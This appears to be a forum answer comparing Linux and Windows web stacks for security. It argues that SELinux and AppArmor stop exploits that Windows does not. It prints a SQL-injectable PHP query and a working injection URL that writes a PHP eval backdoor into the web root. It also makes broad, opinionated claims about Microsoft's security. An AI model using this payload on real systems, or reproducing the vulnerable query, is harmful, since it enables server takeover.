Are there any real benefits to a linux
based stack as opposed to a windows
based stack for exposing web based
applications?
The answer is yes, no doubt about it. All platforms have their problems. However, Linux secuirty systems such as SELinux and AppArmor will break exploits that windows cannot, and I can give a great example.
It is tricky to obtain full remote code execution with MySQL. MS-SQL can allow access to xp_cmdshell() which calls cmd.exe, this makes exploiting SQL Injection a lot easier with this privilege.
To exploit a LAMP system that is vulnerable to sql injection your best bet is to upload a .php file and try and execute it. In MySQL there is the file_priv functions, most importantly: load_file()
and into outfile "..."
. A sql injection attack will look like this:
Vulnerable code:
mysql_query('select "name" from users where id='.$_GET[id])
The corresponding exploit code:
http://127.0.0.1/sql_inj.php?id=1 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"
This does assume that the document root is in /var/www and that the database and httpd are on the same system. The important part is that both AppArmor and SELInux will not allow MySQL to create the file /var/www/backdoor.php and the exploit will fail.
In this case the best approach is to disallow file_priv
, however this attack pattern of creating a persistent backdoor is extremely common with other exploits. This is exaclty why AppArmor and SELInux have been built, to break the exploitation process.
By contrast Windows 2008 has absolutely no secuirty system to stop this type of attack. Windows usually lags behind when it comes to secuirty features, you can see this with Microsoft's slow adoption of memory protection such as canaries and ASLR.
Further more Microsoft is responsible for more dangerous software bugs than any other software vendor.